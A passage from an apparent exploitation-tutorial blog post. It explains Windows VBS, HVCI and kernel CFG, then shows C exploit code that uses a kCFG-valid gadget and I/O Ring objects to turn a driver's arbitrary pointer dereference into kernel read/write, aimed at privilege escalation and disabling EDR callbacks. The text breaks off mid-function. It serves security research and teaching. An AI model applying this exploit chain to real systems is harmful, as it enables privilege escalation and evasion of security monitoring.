From arbitrary pointer dereference to arbitrary read/write in latest Windows 11

In the last part of this Windows kernel exploitation series, we successfully exploited an arbitrary pointer dereference, bypassing SMEP and KVA Shadowing to finally obtain arbitrary code execution in kernel mode.

However, on the latest Windows 11, several security features that are part of Virtualization-Based Security (VBS) are enabled by default and mitigate our exploit. The features we have to face are Hypervisor-protected Code Integrity, a.k.a. HVCI or Memory integrity, and kernel Control Flow Guard (kCFG).

In this article we will briefly examine what VBS, HVCI, and kCFG are. We will then modify our original exploit code to turn the arbitrary pointer dereference into an arbitrary read/write primitive. That primitive in turn allows us to perform data-only attacks such as elevating token privileges, swapping token addresses, disabling EDR kernel callbacks, or setting/unsetting PPL features of an arbitrary process, just to mention a few possibilities.

Note: I started working on this article before the release of Windows 11 24H2. Windows 11 24H2 removed several of the kernel address leaks leveraged in this article. They are still available if you hold SeDebugPrivilege, that is, if you are an Administrator.

Setting up the environment

If you want to follow along, use the instructions below to create a Windows 11 VM with VBS enabled on VMware. First, in the Settings of your host machine look for Core isolation and disable Memory integrity. After that, in VMware go into the Virtual Machine Settings > Options > Advanced menu and check Enable VBS Support.

Note that this also enables Secure Boot, and with Secure Boot enabled you won’t be able to do kernel debugging. To disable it while keeping VBS enabled, navigate to the folder of your VM and open the .vmx file in a text editor. Change the attribute uefi.secureBoot.enabled to FALSE.

Now, run your VM and inside it open Settings, navigate to Core isolation and set Memory integrity to enabled.

Restart the VM. Now your VM should have HVCI and kCFG enabled but Secure Boot disabled, allowing you to set up kernel debugging.

VBS, HVCI, and kCFG

Let’s first understand what VBS, HVCI, and kCFG are and what they imply for exploit development. The following blog posts authored by Connor McGarr shed a lot of light on this topic:

Virtualization Based Security

Virtualization-based security (VBS) uses hardware virtualization and the Windows hypervisor to create an isolated virtual environment. This environment becomes the root of trust of an OS that assumes the kernel can be compromised. Windows uses this isolated environment to host a number of security solutions, such as HVCI and Credential Guard.

The idea is that VBS, using the hypervisor, creates two Virtual Trust Levels (VTLs), isolated environments similar to virtual machines (but they are NOT exactly virtual machines):

Virtual Trust Level 0 (VTL0): An environment that hosts the “regular kernel”, that is ntoskrnl.exe. This is the environment the user interacts with, so it is where user-mode programs are executed, including our exploit.
Virtual Trust Level 1 (VTL1): An environment that hosts the “secure kernel” that is securekernel.exe.

Virtual Trust Levels. Source: Connor McGarr’s blog.

VTL1 is the more privileged environment while VTL0 is the less privileged environment. When the system boots and both environments are loaded, VTL1 is allowed to configure VTL0 by calling the “APIs” offered by the hypervisor, issuing hypercalls.

Relationships between VTL hypervisor and SLAT. Source: *Windows Internals 7th edition* book.

Second Level Address Translation

Second Level Address Translation, or SLAT, allows each VM to run in its own address space in the eyes of the hypervisor. Intel’s implementation of SLAT is known as Extended Page Tables, or EPT (see here).

The idea is that when a VM tries to access memory at a given virtual address VA, the VM uses its own set of Page Table Entries or PTEs, to translate the VA to an address known as Guest Physical Address or GPA (in the following image ignore the last step of accessing the RAM).

Virtual address to physical address translation (x64 arch). Source: *Windows Internals 7th edition* book.

A GPA is still NOT a valid physical address. Therefore, the hypervisor “intercepts” the access to the GPA and uses its own special set of PTEs, known as Extended Page Table Entries or EPTEs, to translate the GPA to a System Physical Address or SPA.

GPA to SPA translation. Source: Rayanfam’s Blog.

The SPA is the final physical address in RAM.

Therefore, the real state of physical memory pages is described by EPTEs and NOT by PTEs when the hypervisor is running.
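
To make the two stages concrete, here is a minimal user-mode sketch of the VA to GPA to SPA walk. It is only a toy model: a flat `std::map` stands in for each multi-level table, and the names `PageMap`, `Translate` and `TranslateVaToSpa` are made up for this illustration.

```cpp
#include <cassert>
#include <cstdint>
#include <map>

// Toy model: one flat map per table, keyed by page number (assumption, not the real layout).
constexpr uint64_t kPageShift = 12;
constexpr uint64_t kPageMask = (1ull << kPageShift) - 1;

using PageMap = std::map<uint64_t, uint64_t>; // source page number -> destination page number

// Translate one address through one table. Returning false models a fault.
bool Translate(const PageMap& table, uint64_t addr, uint64_t& out) {
    auto it = table.find(addr >> kPageShift);
    if (it == table.end()) return false;
    out = (it->second << kPageShift) | (addr & kPageMask); // keep the page offset
    return true;
}

// Stage 1: VA -> GPA through the guest PTEs.
// Stage 2: GPA -> SPA through the hypervisor's EPTEs.
bool TranslateVaToSpa(const PageMap& guestPtes, const PageMap& eptes,
                      uint64_t va, uint64_t& spa) {
    uint64_t gpa = 0;
    return Translate(guestPtes, va, gpa) && Translate(eptes, gpa, spa);
}
```

The point of the sketch is that the guest only ever edits the first map. Whatever it writes there, the second lookup still happens and is owned by the hypervisor.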

If you want to dive deeper on this topic I recommend the Hypervisor from scratch series from Rayanfam’s blog.

HVCI

Hypervisor-protected code integrity (HVCI) is a virtualization-based security (VBS) feature available in Windows 10, Windows 11, and Windows Server 2016 and later.

In a few words, securekernel.exe (running in VTL1) works with the hypervisor at boot time to create a set of EPTEs that describe the final view of physical memory, while the OS in VTL0 (ntoskrnl.exe) maintains its own view of memory.

Basically, all EPTEs are configured so that every page is either readable and writable (RW-) or readable and executable (R-X), but NEVER writable-executable (-WX) or readable-writable-executable (RWX).

So, supposing an attacker does the following:

Store the shellcode in a kernel memory page at virtual address VA.
Exploit a vulnerability (arbitrary write, arbitrary pointer dereference, etc.) that allows setting the Execute bit in the PTE corresponding to virtual address VA.
Trigger shellcode execution at virtual address VA.

The exploit will fail because the CPU, at high level, does the following:

Convert the VA to a GPA (guest physical address), noticing the PTE has the Execute bit set (it was tampered by the attacker at step 2 above).
The GPA is passed to the hypervisor, which converts it into an SPA and notices that the corresponding EPTE doesn’t have the Execute bit set.
Therefore, execution is halted and the exploit fails.
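
The check described in these steps boils down to an intersection of two permission sets. The sketch below is a simplified model of that idea, not the real hardware logic. The `Perms` struct and the helper names are assumptions made for the example.

```cpp
#include <cassert>

// Simplified permission triple; real PTEs and EPTEs carry many more bits.
struct Perms {
    bool read;
    bool write;
    bool execute;
};

// An access is allowed only if BOTH the guest PTE and the EPTE allow it.
constexpr Perms Effective(Perms pte, Perms epte) {
    return { pte.read && epte.read, pte.write && epte.write, pte.execute && epte.execute };
}

// The invariant HVCI maintains on EPTEs: never writable and executable at once.
constexpr bool SatisfiesWxorX(Perms epte) {
    return !(epte.write && epte.execute);
}

constexpr bool CanExecute(Perms pte, Perms epte) {
    return Effective(pte, epte).execute;
}
```

With a tampered PTE of `{true, true, true}` and an EPTE of `{true, true, false}` for the same page, `CanExecute` returns false. That is exactly the failure in step 3.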

EPTEs can be thought of as a second mapping, from guest physical memory to system physical memory, that CANNOT be tampered with by the attacker. In fact, GPA and SPA will have the same value, as the purpose of HVCI is just to make sure an attacker cannot execute arbitrary shellcode in kernel-mode.

Another exploit technique dealing with PTEs is setting the U/S bit of a user-mode page to S, or Supervisor (this is in fact what we did in a previous blog post). This way, when the CPU is running in kernel-mode (CPL = 0), it is allowed to execute the shellcode in the page, bypassing SMEP. EPTEs do not have a U/S bit, therefore they can’t prevent such a scenario.

However, Intel introduced the hardware solution known as Mode-Based Execution Control, or MBEC, to mitigate this attack. The general idea is to mark all user-mode pages in the EPTEs as NON-executable when the CPU is running in kernel-mode. Microsoft introduced Restricted User Mode, or RUM, as a software solution in case the hardware doesn’t support MBEC.
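
As a rough mental model of MBEC (my own simplification, so treat the details as an assumption), you can picture the single Execute bit of the EPTE being split into two: one consulted for pages the guest maps as supervisor and one for pages it maps as user. The `MbecEpte` struct below is hypothetical and only captures that split.

```cpp
#include <cassert>

// Hypothetical, simplified EPTE with the execute permission split in two.
struct MbecEpte {
    bool executeSupervisor; // fetch allowed when the guest PTE says Supervisor
    bool executeUser;       // fetch allowed when the guest PTE says User
};

// The guest PTE's U/S bit only selects WHICH EPTE bit is consulted.
// It cannot grant execution on its own.
constexpr bool MayFetch(MbecEpte epte, bool guestPteIsUser) {
    return guestPteIsUser ? epte.executeUser : epte.executeSupervisor;
}
```

In this model a page holding user-mode code has `executeUser` set and `executeSupervisor` clear. Flipping U/S to S in the guest PTE just makes the CPU consult the bit that is clear, so the fetch is denied.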

At this point, I hope I didn’t confuse you. If I did, I encourage you to read Connor’s whole blog post on HVCI. At the end of the day, as Connor already highlighted in his blog post, HVCI’s impact on exploit development is the following:

PTE manipulation to achieve unsigned-code execution is impossible
Any unsigned-code execution in the kernel is impossible

So, let’s think about our arbitrary pointer dereference. We can no longer craft a ROP chain that tampers with the PTEs, as it would be useless with HVCI.

However, we still have the full set of kernel APIs available. For example, we could craft a ROP chain that overwrites the _KTHREAD.PreviousMode field of the thread to obtain arbitrary read/write primitives in the kernel (well explained in the OST2 – Exp4011 course, taught by Cedric Halbronn).

The issue is that we CAN’T craft ROP chains (in this way) due to kernel Control Flow Guard (kCFG).

kCFG

In a few words, every time there is an indirect function call, as in our case, the function call goes through the nt!_guard_dispatch_icall routine. The routine does the following:

Checks if the target function is valid.
If it is valid, it jumps to the target function.
If it is not valid, the kernel halts execution and there is a BSOD.

For kCFG, every address corresponding to the beginning of a function is considered a valid target.

It is also worth noticing that kCFG is only fully enforced when HVCI is enabled. kCFG uses a bitmap to validate the target. The bitmap is read-only, and this is enforced by HVCI.
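
Here is a small sketch of what a bitmap-based target check looks like. The encoding is an assumption chosen for readability (one bit per 16-byte slot of a single image) and is not the real kCFG bitmap format. `ToyCfgBitmap` is a made-up name.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Assumed granularity for this toy model only.
constexpr uint64_t kSlotSize = 16;

class ToyCfgBitmap {
public:
    ToyCfgBitmap(uint64_t imageBase, uint64_t imageSize)
        : base_(imageBase), bits_((imageSize + kSlotSize - 1) / kSlotSize, false) {}

    // Mark the first byte of a function as a valid indirect-call target.
    void MarkValid(uint64_t functionStart) {
        assert(InRange(functionStart) && (functionStart - base_) % kSlotSize == 0);
        bits_[(functionStart - base_) / kSlotSize] = true;
    }

    // What the dispatch routine conceptually asks before jumping.
    bool IsValidTarget(uint64_t target) const {
        if (!InRange(target) || (target - base_) % kSlotSize != 0) return false;
        return bits_[(target - base_) / kSlotSize];
    }

private:
    bool InRange(uint64_t addr) const {
        return addr >= base_ && addr - base_ < bits_.size() * kSlotSize;
    }

    uint64_t base_;
    std::vector<bool> bits_;
};
```

An address in the middle of a function (a typical ROP gadget) fails the lookup, while the first byte of any marked function passes. That second property is what the rest of the article relies on.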

When HVCI is not enabled, the indirect function calls still go through the nt!_guard_dispatch_icall routine. However, the routine just checks if the address resides in user-space (from 0 to 0x000007FFFFFEFFFF) or in kernel-space (from 0x0000080000000000 to 0xFFFFFFFFFFFFFFFF). In case the address resides in user-space, it halts the execution and triggers a BSOD.

Indeed, if you remember part 2 of this series, when we tried to hijack execution to address 0xdeadbeef we got a BSOD. That was kCFG with HVCI disabled. If you want to understand CFG in more detail, I suggest you start from the following blog post, again authored by Connor McGarr.

So, the impact of kCFG with HVCI enabled is that we CAN’T hijack execution to arbitrary addresses in ntoskrnl.exe, which prevents us from crafting arbitrary ROP chains. However, we can still hijack execution to the beginning of any function in ntoskrnl.exe.

Crafting our new exploit

Now that we have an idea of the impact of the new security mitigations enabled by Microsoft, we can start thinking about how to modify our exploit in order to achieve LPE.

“Relaxing” the constraints

In the previous exploit, I didn’t use any function such as EnumDeviceDrivers() or NtQuerySystemInformation() to leak kernel addresses. In this case, instead, we are going to use NtQuerySystemInformation() to obtain LPE with kCFG/HVCI enabled.

Note: Starting from Windows 11 24H2, EnumDeviceDrivers() and NtQuerySystemInformation() require SeDebugPrivilege to obtain kernel addresses. This means you must be an Administrator in order to use them on the latest Windows 11 version. Of course, this is already a requirement for a BYOVD attack scenario.

Bypassing kCFG

The starting point is always looking for research papers and blog posts from researchers who already had to deal with such a scenario. After a while, I found a really good blog post authored by @tykawaii98 and @void_sec. The vulnerability class is again an arbitrary pointer dereference that allows hijacking the execution flow.

The idea to bypass kCFG is basically finding a function that allows us to perform a data-only attack based on the registers we control when we reach the indirect function call.

Recalling the end of part 2 of this series: “At this point we know we can redirect execution to an arbitrary address and that we control registers RBX, RCX and RDI“. So, we control RBX, RCX and RDI at the moment of the indirect call.

The authors of the blog post discovered nt!DbgkpTriageDumpRestoreState().

Disassembly of nt!DbgkpTriageDumpRestoreState

In a few words, the interesting things that this function does are the following:

move the value from [RCX] to RDX
move the 4 byte value from [RCX+0x10] to EAX
store EAX (with EAX=[RCX+0x10]) at [RDX+0x2078] (with RDX=[RCX])
move the 4 byte value from [RCX+0x14] to EAX
store EAX (with EAX=[RCX+0x14]) at [RDX+0x207c] (with RDX=[RCX])

In other words, the 8 byte value stored at [RCX+0x10] is written to the address RDX+0x2078, where RDX is the value stored at [RCX]. So we get an arbitrary 8 byte write just by controlling the memory RCX points to. As we control RCX, this function is perfect for our purposes.
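
To double check the reasoning, the five steps can be replayed on ordinary user-mode memory. This is only a model of the data flow described above, not the real function. The `GadgetInput` struct, `ModelRestoreState` and `MakeWrite` are names invented for the sketch, and only the offsets 0x00, 0x10, 0x14, 0x2078 and 0x207c come from the text.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical view of the memory RCX points to.
struct GadgetInput {
    uint64_t base;      // +0x00: loaded into RDX
    uint64_t unused;    // +0x08: not used by the steps above
    uint32_t lowDword;  // +0x10: stored at RDX+0x2078
    uint32_t highDword; // +0x14: stored at RDX+0x207c
};
static_assert(offsetof(GadgetInput, lowDword) == 0x10, "must match the offsets in the text");
static_assert(offsetof(GadgetInput, highDword) == 0x14, "must match the offsets in the text");
static_assert(sizeof(void*) == 8, "the model assumes a 64-bit build");

// Replays the two 4-byte stores on plain user-mode memory.
void ModelRestoreState(const GadgetInput* rcx) {
    uint64_t rdx = rcx->base;
    std::memcpy(reinterpret_cast<void*>(rdx + 0x2078), &rcx->lowDword, sizeof(uint32_t));
    std::memcpy(reinterpret_cast<void*>(rdx + 0x207c), &rcx->highDword, sizeof(uint32_t));
}

// Fills the input so that `value` lands at `target` (little-endian, as on x64).
GadgetInput MakeWrite(void* target, uint64_t value) {
    GadgetInput in{};
    in.base = reinterpret_cast<uint64_t>(target) - 0x2078;
    in.lowDword = static_cast<uint32_t>(value);
    in.highDword = static_cast<uint32_t>(value >> 32);
    return in;
}
```

Calling `MakeWrite(&slot, v)` and then `ModelRestoreState` on the result leaves `v` in `slot`. The two adjacent 4-byte stores really do add up to one 8-byte write-what-where.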

Getting arbitrary read/write

In the same article from Crowdfense, the authors show two ways to use this gadget:

Set _KTHREAD.PreviousMode field of the thread to obtain arbitrary read/write of kernel-space memory.
Overwrite the _TOKEN.Privileges.Present field of the current process token adding all privileges to ourselves (basically the same we did in part 3 but with a shellcode).

On the other hand, I decided to use the I/O Ring technique to obtain arbitrary read/write primitives in kernel-space. Why? Mainly because:

It looks like Microsoft is about to mitigate the _KTHREAD.PreviousMode technique (this was outlined in this presentation and in this post, although it seems it will take some time).
Overwriting _TOKEN.Privileges.Present only allows us to elevate our privileges. We can’t disable EDR callbacks or set/unset PPL attributes for processes, while both attacks are possible with arbitrary read/write.
Just playing with I/O Rings.

The I/O Ring technique was discovered and documented by Yarden Shafir and later also described by Ruben Boonen.

Some pieces of code were brutally copy/pasted from Yarden’s repo.

At a high level, the idea is the following:

Allocate an IoRing (_IORING_OBJECT structure in kernel) using the CreateIoRing() API.
Call BuildIoRingRegisterBuffers() so that _IORING_OBJECT.RegBuffers and _IORING_OBJECT.RegBuffersCount are initialized.
Exploit our arbitrary pointer dereference to overwrite _IORING_OBJECT.RegBuffers.
Call BuildIoRingReadFile() to write to an arbitrary kernel address and BuildIoRingWriteFile() to read from an arbitrary kernel address.

So, let’s start modifying the exploit.

Before calling our arbitraryCallDriver(), we place a call to a routine named prepare() that does the following:

Create the _IORING_OBJECT (call to CreateIoRing()) and save the returned pointer to user-mode object in puioring.
Set _IORING_OBJECT.RegBuffers to a dummy array and _IORING_OBJECT.RegBuffersCount to 1 using BuildIoRingRegisterBuffers() and SubmitIoRing() (we have to call SubmitIoRing() every time we want to perform an operation).
Call GetKAddrFromHandle() to obtain the kernel address of the IoRing object from the handle and save the result in ioringaddress. GetKAddrFromHandle() is another routine created by us that internally calls NtQuerySystemInformation() to obtain the kernel address.
Allocate an array containing 1 pointer to a _IOP_MC_BUFFER_ENTRY, named fake_buffers. We will exploit the vulnerability to overwrite _IORING_OBJECT.RegBuffers with fake_buffers.
Instantiate all the named pipes that will be necessary to exploit the arbitrary read/write offered by IoRing.

[...]
    #define REGBUFFERCOUNT 0x1
    [...]
    HANDLE g_device;
    PUIORING puioring = NULL;
    PVOID ioringaddress = NULL;
    HIORING handle = NULL;
    PIOP_MC_BUFFER_ENTRY* fake_buffers = NULL;
    UINT_PTR userData = 0x41414141;
    ULONG numberOfFakeBuffers = 100;
    PVOID addressForFakeBuffers = NULL;
    HANDLE inputPipe = INVALID_HANDLE_VALUE;
    HANDLE outputPipe = INVALID_HANDLE_VALUE;
    HANDLE inputClientPipe = INVALID_HANDLE_VALUE;
    HANDLE outputClientPipe = INVALID_HANDLE_VALUE;
    IORING_BUFFER_INFO preregBuffers[REGBUFFERCOUNT] = { 0 };
    [...]
    PVOID
    AllocateFakeBuffersArray(
        _In_ ULONG NumberOfFakeBuffers
    )
    {
        ULONG size;
        PVOID* fakeBuffers;
    
        
        //
        // This will be an array of pointers to IOP_MC_BUFFER_ENTRYs
        //
    
    
        fakeBuffers = (PVOID*)VirtualAlloc(NULL, NumberOfFakeBuffers * sizeof(PVOID), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        if (fakeBuffers == NULL)
        {
            printf("[-] Failed to allocate fake buffers array\n");
            return NULL;
        }
        if (!VirtualLock(fakeBuffers, NumberOfFakeBuffers * sizeof(PVOID)))
        {
            printf("[-] Failed to lock fake buffers array\n");
            return NULL;
        }
        memset(fakeBuffers, 0, NumberOfFakeBuffers * sizeof(PVOID));
        for (ULONG i = 0; i < NumberOfFakeBuffers; i++)
        {
            fakeBuffers[i] = VirtualAlloc(NULL, sizeof(IOP_MC_BUFFER_ENTRY), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
            if (fakeBuffers[i] == NULL)
            {
                printf("[-] Failed to allocate fake buffer\n");
                return NULL;
            }
            if (!VirtualLock(fakeBuffers[i], sizeof(IOP_MC_BUFFER_ENTRY)))
            {
                printf("[-] Failed to lock fake buffer\n");
                return NULL;
            }
            memset(fakeBuffers[i], 0x41, sizeof(IOP_MC_BUFFER_ENTRY));
        }
        
        printf("[*] fakeBuffers = 0x%p\n", fakeBuffers);
        for (ULONG i = 0; i < NumberOfFakeBuffers; i++) {
            printf("[*] fakeBuffers[%lu] = 0x%p\n", i, fakeBuffers[i]);
        }
    
        return fakeBuffers;
    }
    
    BOOL prepare() {
        HRESULT result;
        IORING_CREATE_FLAGS flags;
    
        flags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
        flags.Advisory = IORING_CREATE_ADVISORY_FLAGS_NONE;
        
        result = CreateIoRing(IORING_VERSION_3, flags, 0x10000, 0x20000, (HIORING*)&handle);
        if (!SUCCEEDED(result))
        {
            printf("[-] Failed creating IO ring handle: 0x%x\n", result);
            return FALSE;
        }
        puioring = (PUIORING)handle;
        printf("[+] Created IoRing. handle=0x%p\n", puioring);
        //pre-register buffer array with len=1
        preregBuffers[0].Address = VirtualAlloc(NULL, 0x100, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        if (!preregBuffers[0].Address)
        {
            printf("[-] Failed to allocate prereg buffer\n");
            return FALSE;
        }
        memset(preregBuffers[0].Address, 0x41, 0x100);
        preregBuffers[0].Length = 0x100;
        result = BuildIoRingRegisterBuffers(handle, REGBUFFERCOUNT, preregBuffers, 0);
        if (!SUCCEEDED(result))
        {
            printf("[-] Failed BuildIoRingRegisterBuffers: 0x%x\n", result);
            return FALSE;
        }
        UINT32 submitted = 0;
        result = SubmitIoRing(handle, 1, INFINITE, &submitted);
        if (!SUCCEEDED(result)) {
            printf("[-] Failed SubmitIoRing: 0x%x\n", result);
            return FALSE;
        }
        printf("[*] submitted = 0x%x\n", submitted);
        ioringaddress = GetKAddrFromHandle(puioring->handle);
        printf("[*] ioringaddress = 0x%p\n", ioringaddress);
        
        fake_buffers = (PIOP_MC_BUFFER_ENTRY*)AllocateFakeBuffersArray(
            REGBUFFERCOUNT
            );
        if (fake_buffers == NULL)
        {
            printf("[-] Failed to allocate fake buffers\n");
            return FALSE;
        }
    
        //
        // Create named pipes for the input/output of the I/O operations
        // and open client handles for them
        //
        inputPipe = CreateNamedPipe(INPUT_PIPE_NAME, PIPE_ACCESS_DUPLEX, PIPE_WAIT, 255, 0x1000, 0x1000, 0, NULL);
        if (inputPipe == INVALID_HANDLE_VALUE)
        {
            printf("[-] Failed to create input pipe: 0x%x\n", GetLastError());
            return FALSE;
        }
        outputPipe = CreateNamedPipe(OUTPUT_PIPE_NAME, PIPE_ACCESS_DUPLEX, PIPE_WAIT, 255, 0x1000, 0x1000, 0, NULL);
        if (outputPipe == INVALID_HANDLE_VALUE)
        {
            printf("[-] Failed to create output pipe: 0x%x\n", GetLastError());
            return FALSE;
        }
    
        outputClientPipe = CreateFile(OUTPUT_PIPE_NAME,
            GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_ALWAYS,
            FILE_ATTRIBUTE_NORMAL,
            NULL);
    
        if (outputClientPipe == INVALID_HANDLE_VALUE)
        {
            printf("[-] Failed to open handle to output file: 0x%x\n", GetLastError());
            return FALSE;
        }
    
        inputClientPipe = CreateFile(INPUT_PIPE_NAME,
            GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_ALWAYS,
            FILE_ATTRIBUTE_NORMAL,
            NULL);
    
        if (inputClientPipe == INVALID_HANDLE_VALUE)
        {
            printf("[-] Failed to open handle to input pipe: 0x%x\n", GetLastError());
            return FALSE;
        }
    
        return TRUE;
    }
    [...]
    int main()
    {
    [...]
        if (!prepare())
            return -1;
    
        arbitraryCallDriver(outputBuffer, SIZE_BUF);
        printf("[+] arbitraryCallDriver returned successfully.\n");
    [...]
    }

Now, let’s modify our arbitraryCallDriver(). Recall from the end of part 2 that at the moment of the jmp rax instruction, we control RCX. RCX corresponds to object2+0x30, which is also ptr->AttachedDevice.

First of all, we change the code in a way that we are able to hijack the execution flow to nt!DbgkpTriageDumpRestoreState, the call gadget useful for bypassing kCFG.

[...]
        * ((PDWORD64)pDriverFunction) = g_ntbase + 0x7f06a0;   //address of DbgkpTriageDumpRestoreState
[...]

Next, we have to store fake_buffers, the value we want to write, at ptr->AttachedDevice+0x10 (remember rcx = ptr->AttachedDevice), which is ptr->AttachedDevice->NextDevice (recall that ptr->AttachedDevice points to a _DEVICE_OBJECT struct).

[...]
        //ptr->AttachedDevice corresponds to rcx when we hijack execution to DbgkpTriageDumpRestoreState
        ptr->AttachedDevice->NextDevice = (_DEVICE_OBJECT*)fake_buffers;  //value of arbitrary write. address of fakeBuffers
[...]

We must then set RDX so that rdx+0x2078 points to the kernel address we want to write to, that is _IORING_OBJECT.RegBuffers.

[...]
        //offset 0x0 (AttachedDevice->Type,Size,ReferenceCount) we store the address that is stored in rdx by DbgkpTriageDumpRestoreState
        PDWORD64 prdx_val = (PDWORD64)ptr->AttachedDevice;
        *prdx_val = (DWORD64)ioringaddress + 0xb8 - 0x2078; //address of RegBuffers in ioring kernel structure
        printf("[*] prdx_val = 0x%p\n", prdx_val);
[...]
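
The arithmetic in the snippet above is easy to get wrong by one sign, so here it is isolated in two tiny helpers. The 0xb8 offset of RegBuffers is the one used in the exploit code and is build-specific. The helper names are made up for this sketch.

```cpp
#include <cassert>
#include <cstdint>

// Displacement of the first store in the gadget, as described earlier.
constexpr uint64_t kGadgetStoreOffset = 0x2078;
// Offset of RegBuffers inside _IORING_OBJECT used by the article's code (build-specific).
constexpr uint64_t kRegBuffersOffset = 0xb8;

// Address of the field we want to overwrite.
constexpr uint64_t RegBuffersAddress(uint64_t ioringObject) {
    return ioringObject + kRegBuffersOffset;
}

// Value to place at [RCX] so that RDX+0x2078 equals `target`.
constexpr uint64_t RdxForTarget(uint64_t target) {
    return target - kGadgetStoreOffset;
}
```

For a sample object address of 0xFFFFE5063F4F8900, the target field is at 0xFFFFE5063F4F89B8 and the value to store at [RCX] is 0xFFFFE5063F4F6940.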

Finally, after calling DeviceIoControl(), we must update the user-mode IoRing struct so that it matches with the corresponding kernel-mode _IORING_OBJECT struct.

[...]
        BOOL res = DeviceIoControl(
            g_device,
            IOCTL_ARBITRARYCALLDRIVER,
            inputBuffer,
            SIZE_BUF,
            outputBuffer,
            outSize,
            &bytesRet,
            NULL
        );
    
        printf("[*] sent IOCTL_ARBITRARYCALLDRIVER \n");
        if (!res) {
            printf("[-] DeviceIoControl failed with error: %lu\n", GetLastError());
        }
    
        //update regBuffer address and size in usermode ioring
        puioring->RegBufferArray = fake_buffers;
        puioring->BufferArraySize = REGBUFFERCOUNT;
[...]

Now, let’s place a getchar() call before and after triggering the vulnerability and run the exploit.

PS Microsoft.PowerShell.Core\FileSystem::\\vmware-host\Shared Folders\Debug> .\DrvExpTemplate.exe
    [+] Opened handle to device: 0x00000000000000FC
    [+] User buffer allocated: 0x0000025258D70000
    [*] sent IOCTL_READMSR
    [+] readMSR success.
    [+] IA32_LSTAR = 0xFFFFF80469A2B700
    [+] g_ntbase = 0xFFFFF80469600000
    [+] Created IoRing. handle=0x0000025258B141C0
    [*] submitted = 0x1
    [*] ioringaddress = 0xFFFFE5063F4F8900
    [*] fakeBuffers = 0x0000025258D90000
    [*] fakeBuffers[0] = 0x0000025258DA0000
    [+] object = 0x0000001AFEFF0000
    [+] second object = 0x0000001AFEFFFFD0
    [+] ptr = 0x0000001AFF000000
    [+] object2 = 0x0000025258DC0000
    [+] driverObject = 0x0000025258DD0000
    [+] ptr->AttachedDevice = 0x0000025258DC0030
    [*] prdx_val = 0x0000025258DC0030
    [+] User buffer allocated: 0x0000025258DB0000

From the output we can see our _IORING_OBJECT was allocated at kernel-space address ioringaddress = 0xFFFFE5063F4F8900. Our fake_buffers array is at user-space address 0x0000025258D90000 and has only one entry, fake_buffers[0], that contains the user-space address 0x0000025258DA0000, that points to our fake _IOP_MC_BUFFER_ENTRY struct.

Now let’s inspect the allocated _IORING_OBJECT in the kernel with WinDbg.

_IORING_OBJECT before triggering the vulnerability.

We can see that _IORING_OBJECT.RegBuffersCount field was successfully set to 1.

Now let’s press enter to trigger the vulnerability and re-inspect the _IORING_OBJECT in WinDbg.

_IORING_OBJECT after triggering the vulnerability.

As we can see, we were able to successfully overwrite _IORING_OBJECT.RegBuffers with the user-space address of fake_buffers.

Now, every time we want to read from/write to a kernel-space address we just need to set the fields _IOP_MC_BUFFER_ENTRY.Address and _IOP_MC_BUFFER_ENTRY.Length at address fake_buffers[0] and call BuildIoRingReadFile()/BuildIoRingWriteFile().
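
If the direction of the two operations feels backwards, the following toy model may help. A byte vector plays the role of kernel memory, a deque plays the role of a pipe, and `ToyBufferEntry` stands in for the Address/Length pair of the fake entry. All names are hypothetical and nothing here touches the real IoRing API.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <deque>
#include <vector>

struct ToyBufferEntry {
    std::size_t address; // offset into the toy memory, plays the role of Address
    std::size_t length;  // plays the role of Length
};

using Memory = std::vector<uint8_t>; // stands in for kernel memory
using Pipe = std::deque<uint8_t>;    // stands in for a named pipe

static bool InBounds(const Memory& memory, const ToyBufferEntry& e) {
    return e.address <= memory.size() && e.length <= memory.size() - e.address;
}

// "Write file" request: registered buffer -> pipe. For us this is a memory READ.
bool ToyWriteFile(const Memory& memory, const ToyBufferEntry& entry, Pipe& pipe) {
    if (!InBounds(memory, entry)) return false;
    auto first = memory.begin() + static_cast<std::ptrdiff_t>(entry.address);
    pipe.insert(pipe.end(), first, first + static_cast<std::ptrdiff_t>(entry.length));
    return true;
}

// "Read file" request: pipe -> registered buffer. For us this is a memory WRITE.
bool ToyReadFile(Memory& memory, const ToyBufferEntry& entry, Pipe& pipe) {
    if (!InBounds(memory, entry) || pipe.size() < entry.length) return false;
    for (std::size_t i = 0; i < entry.length; ++i) {
        memory[entry.address + i] = pipe.front();
        pipe.pop_front();
    }
    return true;
}
```

The registered buffer is always the memory side of the transfer. Writing a file drains the buffer into the pipe, and reading a file fills the buffer from the pipe.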

Crafting our read/write primitives

Now that we’ve successfully overwritten the RegBuffers field, we can create two functions KRead() and KWrite() that use the IoRing object to read and write arbitrary data in kernel-space.

Let’s start with KRead(). It takes as input:

TargetAddress: the kernel-space address we want to read from.
pOut: a buffer allocated by the caller where the function saves the data read.
size: the amount of bytes to read from TargetAddress.

It performs the following operations:

Zero-out the IOP_MC_BUFFER_ENTRY struct at fake_buffers[0] and set TargetAddress and size in IOP_MC_BUFFER_ENTRY.Address and IOP_MC_BUFFER_ENTRY.Length.
Call BuildIoRingWriteFile() and SubmitIoRing() to trigger the IoRing to read IOP_MC_BUFFER_ENTRY.Length bytes from IOP_MC_BUFFER_ENTRY.Address and write them to our OutputPipe.
Read the data from OutputPipe and copy it to pOut using ReadFile().

BOOL KRead(PVOID TargetAddress, PBYTE pOut, SIZE_T size) {
        DWORD bytesRead = 0;
        HRESULT result;
        UINT32 submittedEntries;
        IORING_CQE cqe;
    
        memset(fake_buffers[0], 0, sizeof(IOP_MC_BUFFER_ENTRY));
        fake_buffers[0]->Address = TargetAddress;
        fake_buffers[0]->Length = size;
        fake_buffers[0]->Type = 0xc02;
        fake_buffers[0]->Size = 0x80;
        fake_buffers[0]->AccessMode = 1;
        fake_buffers[0]->ReferenceCount = 1;
    
        auto requestDataBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
        auto requestDataFile = IoRingHandleRefFromHandle(outputClientPipe);
    
        result = BuildIoRingWriteFile(handle,
            requestDataFile,
